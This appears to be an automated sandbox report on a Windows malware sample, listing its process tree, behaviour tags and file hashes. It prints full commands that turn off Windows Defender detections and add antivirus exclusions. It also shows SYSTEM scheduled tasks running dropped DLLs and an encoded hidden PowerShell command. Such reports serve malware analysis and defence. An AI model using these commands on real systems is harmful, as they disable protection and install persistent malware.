C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4984
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3476
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GCRfJHsLrQUU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GCRfJHsLrQUU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RsrRlNSOmQpSC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RsrRlNSOmQpSC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dvcQCBtrcHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dvcQCBtrcHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pjFvAzrMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pjFvAzrMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dOGsUmsmiFFhLNVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dOGsUmsmiFFhLNVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\npCbTmFCzSYUSdqP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\npCbTmFCzSYUSdqP\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4204 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GCRfJHsLrQUU2" /t REG_DWORD /d 0 /reg:323⤵PID:4604
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GCRfJHsLrQUU2" /t REG_DWORD /d 0 /reg:324⤵PID:668
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GCRfJHsLrQUU2" /t REG_DWORD /d 0 /reg:643⤵PID:1276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RsrRlNSOmQpSC" /t REG_DWORD /d 0 /reg:323⤵PID:596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RsrRlNSOmQpSC" /t REG_DWORD /d 0 /reg:643⤵PID:4620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dvcQCBtrcHUn" /t REG_DWORD /d 0 /reg:323⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dvcQCBtrcHUn" /t REG_DWORD /d 0 /reg:643⤵PID:4124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR" /t REG_DWORD /d 0 /reg:323⤵PID:3952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR" /t REG_DWORD /d 0 /reg:643⤵PID:1188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pjFvAzrMU" /t REG_DWORD /d 0 /reg:323⤵PID:1876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pjFvAzrMU" /t REG_DWORD /d 0 /reg:643⤵PID:3880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dOGsUmsmiFFhLNVB /t REG_DWORD /d 0 /reg:323⤵PID:2340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dOGsUmsmiFFhLNVB /t REG_DWORD /d 0 /reg:643⤵PID:5040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg /t REG_DWORD /d 0 /reg:323⤵PID:3380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg /t REG_DWORD /d 0 /reg:643⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\npCbTmFCzSYUSdqP /t REG_DWORD /d 0 /reg:323⤵PID:4596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\npCbTmFCzSYUSdqP /t REG_DWORD /d 0 /reg:643⤵PID:3848
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUdCyHJNk" /SC once /ST 00:35:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:5048
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUdCyHJNk"2⤵PID:3596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUdCyHJNk"2⤵PID:856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EYwoUjzpSpPCMYcxX" /SC once /ST 00:19:36 /RU "SYSTEM" /TR "\"C:\Windows\Temp\npCbTmFCzSYUSdqP\IauGDgmmJIdDdEy\jHkohsw.exe\" nO /site_id 385104 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EYwoUjzpSpPCMYcxX"2⤵PID:4620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4764 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3136
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:1688
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:524
-
C:\Windows\Temp\npCbTmFCzSYUSdqP\IauGDgmmJIdDdEy\jHkohsw.exeC:\Windows\Temp\npCbTmFCzSYUSdqP\IauGDgmmJIdDdEy\jHkohsw.exe nO /site_id 385104 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2392 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bAekpXbeORPoFqoXcn"2⤵PID:360
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3364
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:5080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2704
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1660
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\pjFvAzrMU\oZXQgM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "hJUayhHcLKanQXB" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hJUayhHcLKanQXB2" /F /xml "C:\Program Files (x86)\pjFvAzrMU\MfVUOVd.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hJUayhHcLKanQXB"2⤵PID:1904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hJUayhHcLKanQXB"2⤵PID:3176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jzDKtHfOcumzfg" /F /xml "C:\Program Files (x86)\GCRfJHsLrQUU2\VxuiPTt.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GaLgnGHrfjZKC2" /F /xml "C:\ProgramData\dOGsUmsmiFFhLNVB\jkKsoNP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qisTdcZctOvsmkUWA2" /F /xml "C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR\qniiaSZ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rGnrBBLhNdhAilewNRv2" /F /xml "C:\Program Files (x86)\RsrRlNSOmQpSC\ZRvOMsD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "okLkyXunDVQVEvYWW" /SC once /ST 00:08:16 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\npCbTmFCzSYUSdqP\gwnFCBXe\GNcXjpt.dll\",#1 /site_id 385104" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "okLkyXunDVQVEvYWW"2⤵PID:4812
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2572
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3992
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4196
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EYwoUjzpSpPCMYcxX"2⤵PID:4208
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\npCbTmFCzSYUSdqP\gwnFCBXe\GNcXjpt.dll",#1 /site_id 3851041⤵PID:3336
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\npCbTmFCzSYUSdqP\gwnFCBXe\GNcXjpt.dll",#1 /site_id 3851042⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2876 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "okLkyXunDVQVEvYWW"3⤵PID:4824
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d7cd48b2c0f1ae291b36a7c857bc8999
SHA1d7390735c9767ca428d766efcc57e4f9cd280572
SHA2568ffef5b471f5bfdc0806f597269d1a04990aaabe828c4fdf60189612013148fd
SHA5124a80315797777435dd84b0782c0b6945b2288f2731fded1c9affb3787c9f24b27d01cc699706f5f5f4194948d7e39e03288b632008e9fa3536f88a06c22f0e28
-
Filesize
2KB
MD58c2b76dd48ba38d347dee536379e7cb2
SHA161016244fcda7245f46648369140266252c822da
SHA2567eb78c497ac2dbe49a5b03da1f5aada40f7c68df99cf9e397d038b0b7356bd12
SHA51268c8a7d16b182de497782656861944daaf0b384f73d6bd9e99138ddff9bbd0cb9ef67d69f2657586a47cdf271b989b0b00f2ace7ad73b53d3e3bede208ba09e4
-
Filesize
2KB
MD5ac332f0aca67e83ca1beabfe5f73baef
SHA1fd105e1047a5994975f31c3d0c28639c1c99f2a9
SHA2567cbc4f5bfbcb88a8be3a1e73aebabb448f9456883a413df2f4b2eac6fad778d8
SHA51297acb4daf3afba54a8a32510efe87bfeabd21a6a8377a95dff066ad2ba912a935d9a7a2c6f60efca2e068402109c313fca8595c17bb20485b14da5cda32dc846
-
Filesize
2KB
MD5de15ed3eae1e9cb7ba37539ea1822676
SHA1d12dd01296a96354ba17702f760340b6bf39a259
SHA256e033a605268fbcaa93675988a1c203379751746b3c5a65a01f0bf2914c12536c
SHA512b838b3ed6167cdcd52ea42339a1872e56ace5152922df83648cce4dd36cc6c21acd4c07e38ee2716044102f6f2a0c315e53b91c5aae0c19e26e6f487f549df8d
-
Filesize
2KB
MD58298074be62d98f8f4a69ea83ebf66fa
SHA17bc00ca5db292f1c3bc634e28c02c2edc6d63b58
SHA256bcbae825ea53d019bce2177771b9188b902bdcd4536b127fe08409c6c333fa18
SHA512e5c55422dc39a02bf919b7f5f7299547f01e2dc333596212eb8406c1320fe55793c422dd7ac407cd18b567803d71ac76a48198e8b13a1f021bb862a61f4753a8
-
Filesize
3KB
MD5e9b877cbebdba6a332b76a063ac66a1f
SHA1062e17f825bdc8e12c5275b8245c8eac39a16649
SHA2561acc0827438e2d9c893bd886d1982cdb76c9b598b991c16a74289390d4535bcb
SHA512eac7e45742eb6d9b16538adb81f399b4298d9f0c5442bd47d58783920682046abe36c0c8a3f449230c67321eb62154ffe3f26b47bca5c8de3aa4099aa8fe4eb7
-
Filesize
1KB
MD576f739235d157a7c9d6cadf4878d89cb
SHA142a4b54679268bf29780205c2ceee4d7ce47ee77
SHA256093b07604bcb66117c3bd8772119edd2a107dfbd3c8aa139ac902831fbd13e47
SHA512cde5f0cc0d7ba845e2d2ec66aba4548348d4014b82e85971ddda3ec961d035657e945a36092c3edd85d0e7ea456f7d43361ae1f2f9b7aa5af1b1cbc9fd5eb2ab
-
Filesize
6.2MB
MD5c47473fafd74825612fa88cfdbb69694
SHA13b5b8a003f1d845e24cf4cf430020dc5027fd880
SHA25677e5b91cb2a37f44e847a16fea75cb124bf7df3419a905234d7212370e06be96
